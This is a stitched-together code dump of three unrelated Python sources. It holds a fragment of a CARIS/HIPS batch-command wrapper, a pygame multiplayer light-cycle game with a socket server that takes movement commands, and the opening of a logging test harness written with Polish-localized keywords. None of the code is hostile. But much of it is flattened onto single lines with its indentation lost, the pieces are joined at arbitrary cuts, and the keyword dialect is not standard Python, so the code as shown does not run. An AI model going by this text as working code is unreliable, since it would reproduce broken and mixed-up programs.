Example: carisbatch.exe --run ShiftElevationBands --shift-type RASTER --input-band ALL --shift-file "D:\NAD83-MLLW_Expanded.csar" --elevation-band NAD83_MLLW "D:\F00768_Laser.csar" "D:\F00768_Laser_New_NAD83_MLLW.csar"''' fullcommand = self.hipscommand + ' --run ShiftElevationBands --shift-type ' + str(inputformat) fullcommand += ' --input-band ' + input_band + ' --shift-file "' + shiftfile + '" --elevation-band ' + elev_band fullcommand += ' "' + inputfile + '" "' + outputfile + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def import_points_to_csar(self, source, output_epsg, dest_csar, resolution='8m', prim_band='Depth', grid_method='BASIC', inputformat='ASCII', input_epsg=None, infofile=None): '''Runs ImportPoints with all the options. Example: carisbatch.exe --run ImportPoints --input-format ASCII --input-crs EPSG:26918 --output-crs EPSG:26918 --gridding-method BASIC --resolution 8m --info-file c:\path_to_info_file --primary-band Depth c:\path_to_ascii_data c:\path_to_dest_csar''' if not self.basecommand: lic, msg = self.caris_base_license_check(printout=False) if not lic: return if str(inputformat) == 'ASCII': fullcommand = self.basecommand + ' --run ImportPoints --input-format ' + str(inputformat) if input_epsg: fullcommand += ' --input-crs EPSG:' + str(input_epsg) fullcommand += ' --output-crs EPSG:' + str(output_epsg) if infofile: fullcommand += ' --info-file "' + str(infofile) + '"' else: print('Invalid input format - {}. 
This format is not supported.'.format(inputformat)) return if grid_method: fullcommand += ' --resolution ' + str(resolution) + ' --gridding-method ' + grid_method fullcommand += ' --primary-band ' + prim_band + ' "' + source + '" "' + dest_csar + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def export_csar_to_ascii(self, inputcsar, output_crs, outputascii, inputband='Depth', inputprecision='9', coordformat='LLDG_DD'): '''Runs ExportCoverageToASCII with all the options. Example: carisbatch.exe -r exportcoveragetoascii --include-band Depth 9 --output-crs EPSG:6319 --coordinate-format LLDG_DD --coordinate-precision 9 --coordinate-unit m "F00768_Laser_rawdepths.csar" "F00768_Laser_rawdepths.txt"''' # 9 is max precision in carisbatch fullcommand = self.hipscommand + ' --run exportcoveragetoascii --include-band "' + str(inputband) + '" ' + str(inputprecision) fullcommand += ' --output-crs EPSG:' + output_crs + ' --coordinate-format "' + coordformat + '" --coordinate-precision ' fullcommand += inputprecision + ' --coordinate-unit m "' + inputcsar + '" "' + outputascii + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def vr_csar_to_sr_csar(self, surface, output_res, outputname): '''Runs ResampleSurfacetoRaster with all the options. Example: carisbatch.exe --run ResampleSurfacetoRaster --output-format GeoTIFF --include-band Depth C:\HIPSData\Products\VR.csar C:\HIPSData\Products\VR.tiff''' fullcommand = self.hipscommand + ' --run ResampleSurfacetoRaster --resolution ' + str(output_res) fullcommand += ' "' + surface + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def bag_to_csar(self, bag, outputname): '''Runs CopytoCsar with all the options. 
Example: carisbatch.exe --run CopytoCsar C:\HIPSData\Products\bag.bag C:\HIPSData\Products\bag.csar''' fullcommand = self.hipscommand + ' --run CopytoCsar' fullcommand += ' "' + bag + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def qctools_py3(self, outputname, flierfinder=False, gridqa=False, holidayfinder=False, holidayfindermode="OBJECT_DETECTION", vr=False): # retrive the path to the "activate.bat" activate_file = retrieve_activate_batch() # script's input variables grid_path = outputname # VR # grid_path = "C:\\Users\\gmasetti\\Desktop\\test_vr\\H12880_MB_1m_MLLW_Final.csar" # SR flier_finder = "0" holiday_finder = "0" grid_qa = "0" if flierfinder: flier_finder = "1" if holidayfinder: holiday_finder = "1" if gridqa: grid_qa = "1" start = retrieve_noaa_folder_path() spackages = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))) qcscripts = os.path.join(spackages, 'Python3', 'hyo2', 'qc', 'scripts', 'qc_scripts.py') startpy = retrieve_install_prefix() if os.path.exists(grid_path): args = ["cmd.exe", "/K", "set pythonpath=", "&&", # run shell (/K: leave open (debugging), /C close the shell) activate_file, "Pydro367", "&&", # activate the Pydro36 virtual environment 'python', qcscripts, # call the script with a few arguments '"' + grid_path.replace("&", "^&") + '"', # surface path flier_finder, # flier finder arguments holiday_finder, holidayfindermode, # holiday finder arguments grid_qa, # grid QA arguments self.sheet_name + '_QC' # QCTools Output Folder Name ] subprocess.Popen(' '.join(args), creationflags=subprocess.CREATE_NEW_CONSOLE) else: print("**QCTools skipped: This surface does not exist: {}**".format(grid_path)) def log_to_pdf(self): outputpdf = os.path.splitext(self.logger)[0] + '.pdf' pdfclass = pyText2Pdf.pyText2Pdf(input_file=self.logger, output_file=outputpdf) pdfclass.Convert() def open_hips(self): fullcommand = '"' 
+ os.path.join(os.path.split(self.hipscommand)[0], 'caris_hips.exe') + '"' fullcommand += ' "' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips"') subprocess.Popen(fullcommand)
# ---- Server.py ----
# Copyright (c) 2019 Grzegorz Raczek
# https://github.com/grzracz
# Files available under MIT license

from queue import Queue
import pygame
import socket
import threading
import time
import random
import sys
import winsound

host = "192.168.137.1"
port = 10000


class Server:
    '''Threaded TCP server that accepts one client at a time and queues its
    LEFT/RIGHT/UP/DOWN movement commands for a Player.'''

    def __init__(self, host_addr, port):
        # BUGFIX: attributes must be assigned BEFORE the listener thread starts;
        # run() reads self.host/self.port and previously raced __init__.
        self.host = host_addr
        self.port = port
        self.client = ""
        self.connected = False  # BUGFIX: was "" — use a real boolean flag
        self.q = Queue(5)  # at most 5 buffered commands
        self.color = (255, 255, 255)
        thread = threading.Thread(target=self.run)
        thread.daemon = True
        thread.start()

    def clear_queue(self):
        '''Drop all queued commands (used when the client disconnects).'''
        while not self.q.empty():
            self.q.get()

    def run(self):
        '''Listener loop: accept a client, queue its valid commands until it disconnects.'''
        serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        serversocket.bind((self.host, self.port))
        print("Server running:", self.host + ":" + str(self.port))
        serversocket.listen(1)
        while True:
            (clientsocket, address) = serversocket.accept()
            # first message from the client is its self-reported address/name
            self.client = clientsocket.recv(64).decode()
            print("Client with address", self.client, "connected to socket", self.host + ":" + str(self.port))
            self.connected = True
            # CAN DO SOMETHING HERE WITH THE CLIENT YOU ARE CONNECTED TO
            while True:
                info = clientsocket.recv(128)
                if not info:
                    break
                # DO SOMETHING WITH WHAT WAS SENT
                command = info.decode()
                if command in ("LEFT", "RIGHT", "UP", "DOWN"):
                    if self.q.full():
                        print(self.client + ":", "queue is full, unable to store command:", command)
                    else:
                        print(self.client + ":", command)
                        self.q.put(command)
                else:
                    print(self.client, "sent an unknown command:", info)
            # DO SOMETHING WHEN CLIENT DISCONNECTS
            self.connected = False
            self.clear_queue()
            print("Client with address", self.client, "disconnected from socket", self.host + ":" + str(self.port))


class Player:
    '''Light-cycle style player square driven by its Server's command queue.
    Relies on module globals `screen`, `width`, `height`, `box_width`, `C`
    defined elsewhere in this file.'''

    def __init__(self, server, starting_point, color, direction, speed):
        self.server = server
        self.start_x = starting_point[0]
        self.start_y = starting_point[1]
        self.x = self.start_x
        self.y = self.start_y
        self.color = color
        self.start_direction = direction
        self.direction = self.start_direction
        self.speed = speed
        self.stopped = False
        self.show = True
        self.points = 0

    def change_starting_point(self, point, direction):
        '''Move the respawn location and snap the player to it.'''
        self.start_x = point[0]
        self.start_y = point[1]
        self.x = self.start_x
        self.y = self.start_y
        self.start_direction = direction
        self.direction = self.start_direction

    def stop(self):
        self.stopped = True

    def toggle_show(self):
        # 1-in-5 chance per call to blink the player invisible
        self.show = random.randint(0, 4) != 0

    def reset(self):
        '''Return to the starting point and state for a new round.'''
        self.stopped = False
        self.x = self.start_x
        self.y = self.start_y
        self.direction = self.start_direction
        self.show = True

    def draw(self):
        pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width))

    def update(self):
        '''Advance one frame; returns False on collision or when stopped, else True.'''
        if not self.stopped:
            self.points += 0.1
            new_direction = self.direction
            if not self.server.q.empty():
                new_direction = self.server.q.get()
            # A player may not reverse straight into itself.
            if self.direction == "UP":
                if new_direction != "DOWN":
                    self.direction = new_direction
            elif self.direction == "DOWN":
                if new_direction != "UP":
                    self.direction = new_direction
            elif self.direction == "RIGHT":
                if new_direction != "LEFT":
                    self.direction = new_direction
            elif self.direction == "LEFT":
                if new_direction != "RIGHT":
                    self.direction = new_direction
            if not self.show:
                # erase the trail cell while blinking
                pygame.draw.rect(screen, C.black, pygame.Rect(self.x, self.y, box_width, box_width))
            check_pixel_1 = (1, 1)
            check_pixel_2 = (1, 1)
            # Move, wrap around screen edges, and pick the two probe pixels
            # just ahead of the leading edge.
            if self.direction == "UP":
                self.y -= self.speed
                if self.y < 1:
                    if self.show:
                        pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width))
                    self.y = height - 1
                check_pixel_1 = (self.x, self.y - 1)
                check_pixel_2 = (self.x + box_width, self.y - 1)
            elif self.direction == "DOWN":
                self.y += self.speed
                if self.y + box_width + 1 > height:
                    if self.show:
                        pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width))
                    self.y = 2 - box_width
                check_pixel_1 = (self.x, self.y + box_width + 1)
                check_pixel_2 = (self.x + box_width, self.y + box_width + 1)
            elif self.direction == "RIGHT":
                self.x += self.speed
                if self.x + box_width + 1 > width:
                    if self.show:
                        pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width))
                    self.x = 2 - box_width
                check_pixel_1 = (self.x + box_width + 1, self.y)
                check_pixel_2 = (self.x + box_width + 1, self.y + box_width)
            elif self.direction == "LEFT":
                self.x -= self.speed
                if self.x < 1:
                    if self.show:
                        pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width))
                    self.x = width - 1
                check_pixel_1 = (self.x - 1, self.y)
                check_pixel_2 = (self.x - 1, self.y + box_width)
            # Clamp both probes onto the screen before sampling.
            if check_pixel_1[0] < 0:
                check_pixel_1 = (0, check_pixel_1[1])
            if check_pixel_1[0] >= width:
                check_pixel_1 = (width - 1, check_pixel_1[1])
            if check_pixel_1[1] < 0:
                check_pixel_1 = (check_pixel_1[0], 0)
            if check_pixel_1[1] >= height:
                check_pixel_1 = (check_pixel_1[0], height - 1)
            if check_pixel_2[0] < 0:
                check_pixel_2 = (0, check_pixel_2[1])
            if check_pixel_2[0] >= width:
                check_pixel_2 = (width - 1, check_pixel_2[1])
            if check_pixel_2[1] < 0:
                check_pixel_2 = (check_pixel_2[0], 0)
            if check_pixel_2[1] >= height:
                check_pixel_2 = (check_pixel_2[0], height - 1)
            pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width))
            pixel = pygame.Surface.get_at(screen, check_pixel_1)
            pixel2 = pygame.Surface.get_at(screen, check_pixel_2)
            # Collision if either probe is not background (black / near-black).
            # BUGFIX: second probe compared against a 3-tuple (20, 20, 20);
            # get_at returns RGBA, so use 4-tuples like the first probe.
            if not (pixel == (0, 0, 0, 255) or pixel == (20, 20, 20, 255)) \
                    or not (pixel2 == (20, 20, 20, 255) or pixel2 == (0, 0, 0, 255)):
                return False
            return True
        else:
            return False


class StartingPoints:
    '''Grid of spawn points; third tuple element flags a point as taken.'''

    def __init__(self):
        self.points = []
        for x in range(1, 9):
            for y in range(1, 4):
                # NOTE(review): both parity branches append the same point, so
                # every y is added for each even x — confirm this is intended.
                if x % 2 == 0:
                    if y % 2 == 1:
                        self.points.append((int(x * width / 10), int(y * height / 4), False))
                    if y % 2 == 0:
                        self.points.append((int(x * width / 10), int(y * height / 4), False))

    def reset(self):
        '''Mark every point as free again.'''
        # BUGFIX: range stopped at len-1, so the last point was never reset.
        for x in range(0, len(self.points)):
            self.points[x] = (self.points[x][0], self.points[x][1], False)

    def random_point(self):
        '''Pick a random free point (linear probing from a random start).'''
        temp = random.randint(0, len(self.points) - 1)
        while self.points[temp][2]:
            temp = (temp + 1) % len(self.points)
self.points[temp] = (self.points[temp][0], self.points[temp][1], True) return self.points[temp][0], self.points[temp][1] class Colors: def __init__(self): self.black = (0, 0, 0) self.white = (255, 255, 255) self.grey = (20, 20, 20) self.deadly_grey = (21, 21, 21) self.colors = [] self.colors.append((255, 0, 0, False)) self.colors.append((34, 139, 34, False)) self.colors.append((0, 0, 255, False)) self.colors.append((255, 255, 0, False)) self.colors.append((0, 255, 255, False)) self.colors.append((255, 0, 255, False)) self.colors.append((255, 102, 178, False)) self.colors.append((153, 0, 0, False)) def reset(self): for x in range(0, len(self.colors) - 1): self.colors[x] = (self.colors[x][0], self.colors[x][1], self.colors[x][2], False) def random_color(self): temp = random.randint(0, len(self.colors) - 1) while self.colors[temp][3]: temp = (temp + 1) % len(self.colors) self.colors[temp] = (self.colors[temp][0], self.colors[temp][1], self.colors[temp][2], True) return self.colors[temp][0], self.colors[temp][1], self.colors[temp][2] def random_direction(): temp = random.randint(0, 3) if temp == 0: return "UP" elif temp == 1: return "RIGHT" elif temp == 2: return "DOWN" else: return "LEFT" def servers_connected(servers_list): for x in range(0, number_of_players): if not servers_list[x].connected: return False return True def players_connected(players_list): for x in range(0, number_of_players): if not players_list[x].server.connected: return False return True def players_stopped(players_list): players_stopped_number = 0 for x in range(0, number_of_players): if players_list[x].stopped: players_stopped_number += 1 if players_stopped_number >= number_of_players - 1: return True else: return False def find_moving_player(players_list): for x in range(0, number_of_players): if not players_list[x].stopped: return players_list[x] def get_points(player_input): return player_input.points def draw_menu(players_list, frame_count): pygame.draw.rect(screen, C.black, 
pygame.Rect(width + box_width, 0, width + menu_width, height)) pygame.draw.rect(screen, C.grey, pygame.Rect(width, 0, box_width, height)) logo_width = logorect.width indent = int((menu_width + box_width - logo_width) / 2) logorect.x = width + indent logorect.y = int(indent / 2) screen.blit(logo, logorect) temp_y = logorect.y + logorect.height + int(indent / 2) temp_x = width + int(indent / 2) screen.blit(text_fieldclosing, (temp_x, temp_y)) temp_x += int(indent/4) temp_y += int(indent/4) time_color = C.white if waiting_for_round: time_left = "10:00" elif not fog_closing: time_left_seconds = str(9 - int(frame_count / 60)) time_left_smaller = str(int((60 - frame_count % 60) * 1.6)) if int(time_left_smaller) < 10: time_left_smaller = "0" + str(int(time_left_smaller)) if frame_count % 60 == 0: time_left_seconds = str(int(time_left_seconds) + 1) time_left_smaller = "00" time_left = str(time_left_seconds + ":" + time_left_smaller) if int(time_left_seconds) < 3: time_color = (255, 0, 0) else: time_color = C.white else: time_color = (255, 0, 0) time_left = "Closing..." text_timeleft = bigfont.render(time_left, True, time_color) rect_width = menu_width - int(1.5 * indent) rect_height = 100 screen.blit(text_timeleft, (temp_x + int((rect_width - text_timeleft.get_width())/2), temp_y + int((rect_height - text_timeleft.get_height())/2))) temp_x -= int(indent/4) temp_y += 2 * int(indent) screen.blit(text_ranking, (temp_x, temp_y)) sorted_players = [] for x in range(0, number_of_players): sorted_players.append(players_list[x]) sorted_players.sort(key=get_points, reverse=True) player_num = 0 for x in sorted_players: temp_y += int(indent/2.5) player_num += 1 text_player_ranking = font.render(str(player_num) + ". 
Player " + str(x.server.port - (port - 1)) + ": " + str(int(x.points)) + " points", True, x.color) screen.blit(text_player_ranking, (temp_x, temp_y)) if waiting_for_round: temp_x += int(indent / 4) temp_y += int(indent * 4) text_waiting_for_round = font.render("Next round in:", True, C.white) screen.blit(text_waiting_for_round, (temp_x, temp_y)) temp_y += int(indent / 2) text_seconds_to_round = bigfont.render(str(3 - int(frame_count / 60)), True, C.white) screen.blit(text_seconds_to_round, (temp_x + int((rect_width - text_seconds_to_round.get_width())/2), temp_y + int((rect_height - text_seconds_to_round.get_height())/2))) return sorted_players[0].points def scale_fog_value(number, value): for iter1 in range(0, number): value = int(0.75 * value) return value def draw_outline(number): outline_width = 5 current_width = scale_fog_value(number, width) current_height = scale_fog_value(number, height) indent_x = int((width - current_width) / 2) indent_y = int((height - current_height) / 2) pygame.draw.rect(screen, C.grey, pygame.Rect(indent_x, indent_y, current_width, outline_width)) pygame.draw.rect(screen, C.grey, pygame.Rect(indent_x, indent_y, outline_width, current_height)) pygame.draw.rect(screen, C.grey, pygame.Rect(current_width + indent_x, indent_y, outline_width, current_height + outline_width)) pygame.draw.rect(screen, C.grey, pygame.Rect(indent_x, indent_y + current_height, current_width, outline_width)) def draw_fog(percent, number): outline_width = 5 current_width = scale_fog_value(number, width) current_height = scale_fog_value(number, height) previous_width = scale_fog_value(number - 1, width) previous_height = scale_fog_value(number - 1, height) previous_x = int((width - previous_width) / 2) previous_y = int((height - previous_height) / 2) indent_x = int((previous_width - current_width) * percent/200) + outline_width indent_y = int((previous_height - current_height) * percent/200) + outline_width pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(0, 0, 
width, previous_y + indent_y)) pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(0, 0, previous_x + indent_x, height)) pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(width - previous_x - indent_x, 0, previous_x + indent_x, height)) pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(0, height - previous_y - indent_y, width, previous_y + indent_y)) def get_next_color(colors, number): while True: next_number = (number + 1) % len(colors) number = (number + 1) % len(colors) if not colors[next_number][3]: return next_number def get_previous_color(colors, number): while True: next_number = (number - 1) % len(colors) number = (number - 1) % len(colors) if not colors[next_number][3]: return next_number # GLOBAL VARIABLES/CONSTANTS width = 1920 height = 1080 box_width = 10 start_speed = 2 title = "Lines: Battle Royale!" number_of_players = 2 numbers = ["2", "3", "4", "5", "6"] if len(sys.argv) == 2: if sys.argv[1] not in numbers: print("Incorrect number of players, setting the default: 2") else: print("Number of players:", sys.argv[1]) number_of_players = int(sys.argv[1]) # SERVERS START RUNNING servers = [] for i in range(0, number_of_players): time.sleep(0.1) servers.append(Server(host, port + i)) # APPLICATION STARTS pygame.init() screen = pygame.display.set_mode((width, height), pygame.HWSURFACE, 32) pygame.display.set_mode((width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) surface = pygame.display.get_surface() pygame.display.set_caption(title) clock = pygame.time.Clock() # CONNECTING TO PORTS arrow_left = pygame.image.load("img/arrowleft.png") arrow_right = pygame.image.load("img/arrowright.png") arrow_down = pygame.image.load("img/arrowdown.png") logobig = pygame.image.load("img/linesbig.png") logobig_rect = logobig.get_rect() font = pygame.font.Font("fonts/edosz.ttf", 30) medfont = pygame.font.Font("fonts/edosz.ttf", 32) bigfont = pygame.font.Font("fonts/edosz.ttf", 60) C = Colors() screen.fill(C.black) connected_frames = 0 all_connected = 
False while not all_connected: for event in pygame.event.get(): if event.type == pygame.QUIT: exit(0) if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width, height)) pygame.mouse.set_visible(True) screen.fill(C.black) indent = int((width - logobig_rect.width) / 2) logobig_rect.x = indent logobig_rect.y = int(indent / 4) screen.blit(logobig, logobig_rect) text = font.render("Please connect to open ports:", True, C.white) temp_y = logobig_rect.y + indent temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) server_counter = 0 temp_y += 50 for s in servers: server_counter += 1 temp_y += int(indent / 18) text = font.render("Player " + str(server_counter) + ": " + s.host + ":" + str(s.port) + ((" (Connected by " + s.client + ")") if s.connected else ""), True, ((3, 125, 80) if s.connected else C.white)) temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) if servers_connected(servers): text = bigfont.render("All players connected! 
Starting soon: " + str(5 - int(connected_frames / 60)) + "...", True, (2, 100, 64)) temp_y = height - text.get_height() - 20 temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) connected_frames += 1 else: connected_frames = 0 if connected_frames == 300: all_connected = True pygame.display.flip() clock.tick(60) # CHOSING COLORS possible_colors = [(255, 255, 255, False), (224, 205, 255, False), (102, 255, 102, False), (102, 102, 255, False), (255, 255, 0, False), (255, 0, 127, False), (0, 0, 153, False), (255, 0, 0, False), (76, 153, 0, False)] color_number = random.randint(0, len(possible_colors) - 1) players_chose = [] for i in range(0, number_of_players): players_chose.append(False) for s in servers: color_number = get_next_color(possible_colors, color_number) s.clear_queue() while not players_chose[s.port - port]: for event in pygame.event.get(): if event.type == pygame.QUIT: exit(0) if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width, height)) pygame.mouse.set_visible(True) color = possible_colors[color_number] screen.fill(C.black) indent = int((width - logobig_rect.width) / 2) logobig_rect.x = indent logobig_rect.y = int(indent / 4) screen.blit(logobig, logobig_rect) text = font.render("Choose your color:", True, C.white) temp_y = int(logobig_rect.y + indent) - 100 temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) text = bigfont.render("Player " + str(s.port + 1 - port) + ":", True, color) temp_y += int(indent / 10) temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) rect_side = 100 temp_x = int((width - rect_side)/2) temp_y += int(indent / 4) pygame.draw.rect(screen, C.grey, pygame.Rect(temp_x - 5, temp_y - 5, rect_side + 10, rect_side + 10)) pygame.draw.rect(screen, color, 
pygame.Rect(temp_x, temp_y, rect_side, rect_side)) temp_x -= int(indent/4) temp_y += int((rect_side - arrow_left.get_rect().height) / 2) screen.blit(arrow_left, pygame.Rect(temp_x, temp_y, arrow_left.get_rect().width, arrow_left.get_rect().height)) temp_x += int(indent/2) + rect_side - arrow_left.get_rect().width screen.blit(arrow_right, pygame.Rect(temp_x, temp_y, arrow_right.get_rect().width, arrow_right.get_rect().height)) text = font.render("Confirm", True, C.white) temp_y += int(indent / 3) temp_x = int((width - text.get_width())/2) screen.blit(text, (temp_x, temp_y)) temp_y += int(indent/16) temp_x = int((width - arrow_down.get_rect().width)/2) screen.blit(arrow_down, pygame.Rect(temp_x, temp_y, arrow_down.get_rect().width, arrow_down.get_rect().height)) if not s.q.empty(): command = s.q.get() if command == "LEFT": color_number = get_previous_color(possible_colors, color_number) winsound.PlaySound("sounds/move.wav", winsound.SND_ASYNC) elif command == "RIGHT": color_number = get_next_color(possible_colors, color_number) winsound.PlaySound("sounds/move.wav", winsound.SND_ASYNC) elif command == "DOWN": winsound.PlaySound("sounds/kick.wav", winsound.SND_ASYNC) s.color = (possible_colors[color_number][0], possible_colors[color_number][1], possible_colors[color_number][2]) possible_colors[color_number] = (possible_colors[color_number][0], possible_colors[color_number][1], possible_colors[color_number][2], True) players_chose[s.port - port] = True pygame.display.flip() clock.tick(60) # MAIN GAMEPLAY menu_width = int(0.2 * width) width -= menu_width text_fieldclosing = font.render("Field closing in:", True, C.white) text_ranking = font.render("Ranking:", True, C.white) logo = pygame.image.load("img/lines.png") crown = pygame.image.load("img/crown.png") logorect = logo.get_rect() crownrect = crown.get_rect() last_time = "" S = StartingPoints() game_ended = False players = [] for i in range(0, number_of_players): players.append(Player(servers[i], S.random_point(), 
servers[i].color, random_direction(), start_speed)) S.reset() C.reset() screen.fill(C.black) pygame.display.flip() frame_counter = 1 fog_number = 1 waiting_for_round = True draw_menu(players, frame_counter) draw_outline(fog_number) done = False S.reset() for i in range(0, number_of_players): players[i].reset() players[i].update() for i in range(0, 180): for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width + menu_width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width + menu_width, height)) pygame.mouse.set_visible(True) last_time = frame_counter frame_counter = i draw_menu(players, frame_counter) pygame.display.flip() clock.tick(60) while not game_ended: waiting_for_round = False fog_closing = False fog_number = 1 fog_current_percent = 0 frame_counter = 1 screen.fill(C.black) draw_menu(players, frame_counter) draw_outline(fog_number) done = False S.reset() while not done: for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width + menu_width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width + menu_width, height)) pygame.mouse.set_visible(True) if players_connected(players): if not fog_closing: frame_counter += 1 if frame_counter % 30 == 0: for i in range(0, number_of_players): players[i].toggle_show() for i in range(0, number_of_players): check_player = players[i].update() if not check_player: winsound.PlaySound("sounds/kick.wav", winsound.SND_ASYNC) players[i].stop() if players_stopped(players): winsound.PlaySound("sounds/victory.wav", winsound.SND_ASYNC) moving_player = find_moving_player(players) if moving_player is not None: 
moving_player.points += 100 screen.blit(crown, (moving_player.x - 11, moving_player.y - 35)) draw_menu(players, frame_counter) pygame.display.flip() for i in range(0, 180): for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width + menu_width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width + menu_width, height)) pygame.mouse.set_visible(True) waiting_for_round = True last_time = frame_counter frame_counter = i draw_menu(players, frame_counter) pygame.display.flip() clock.tick(60) done = True if not fog_closing: draw_outline(fog_number) if frame_counter is not 0 and frame_counter % 601 == 0: fog_closing = True frame_counter = 0 else: draw_fog(fog_current_percent, fog_number) fog_current_percent += 0.5 if fog_current_percent > 100: fog_current_percent = 0 fog_closing = False frame_counter = 1 fog_number += 1 most_points = draw_menu(players, frame_counter) if most_points >= 1000: game_ended = True pygame.display.flip() clock.tick(60) for i in range(0, number_of_players): players[i].reset() players[i].change_starting_point(S.random_point(), random_direction()) players[i].update() # ON GAME ENDED winsound.PlaySound("sounds/won.wav", winsound.SND_ASYNC) players.sort(key=get_points, reverse=True) width = width + menu_width while True: for event in pygame.event.get(): if event.type == pygame.QUIT: exit(0) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: exit(0) screen.fill(C.black) indent = int((width - logobig_rect.width) / 2) logobig_rect.x = indent logobig_rect.y = int(indent / 4) screen.blit(logobig, logobig_rect) text = bigfont.render("Winner - Player " + str(players[0].server.port + 1 - port) + ": " + str(int(players[0].points)) + " points", True, players[0].color) temp_y = logobig_rect.y + indent temp_x = int((width - 
text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) player_num = 1 temp_y += int(indent/10) for r in range(1, number_of_players): _x = players[r] temp_y += int(indent/15) player_num += 1 text_player_ranking = font.render(str(player_num) + ". Player " + str(_x.server.port - (port - 1)) + ": " + str(int(_x.points)) + " points", True, _x.color) temp_x = int((width - text_player_ranking.get_width()) / 2) screen.blit(text_player_ranking, (temp_x, temp_y)) pygame.display.flip() clock.tick(60)
# ===== File: test_logging.py =====
# NOTE(review): this file uses Polish-localized Python keywords
# (zaimportuj=import, klasa=class, spróbuj=try, wyjąwszy=except,
# w_końcu=finally, dla=for, w=in, jeżeli=if, dopóki=while, zwróć=return,
# podnieś=raise, dalej=pass, Prawda/Nieprawda/Nic=True/False/None,
# jest/nie/oraz/albo=is/not/and/or).  It only runs under a Polish-localized
# Python dialect; the code tokens are kept verbatim and only comments and
# docstrings have been restored to English.  The final method is truncated
# at the end of this chunk exactly as in the source.
#
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""Test harness for the logging module. Run all tests.

Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""

zaimportuj logging
zaimportuj logging.handlers
zaimportuj logging.config

zaimportuj codecs
zaimportuj configparser
zaimportuj datetime
zaimportuj pickle
zaimportuj io
zaimportuj gc
zaimportuj json
zaimportuj os
zaimportuj queue
zaimportuj random
zaimportuj re
zaimportuj socket
zaimportuj struct
zaimportuj sys
zaimportuj tempfile
z test.support.script_helper zaimportuj assert_python_ok
z test zaimportuj support
zaimportuj textwrap
zaimportuj time
zaimportuj unittest
zaimportuj warnings
zaimportuj weakref
spróbuj:
    zaimportuj threading
    # The following imports are needed only for tests which
    # require threading
    zaimportuj asyncore
    z http.server zaimportuj HTTPServer, BaseHTTPRequestHandler
    zaimportuj smtpd
    z urllib.parse zaimportuj urlparse, parse_qs
    z socketserver zaimportuj (ThreadingUDPServer, DatagramRequestHandler,
                               ThreadingTCPServer, StreamRequestHandler)
wyjąwszy ImportError:
    threading = Nic
spróbuj:
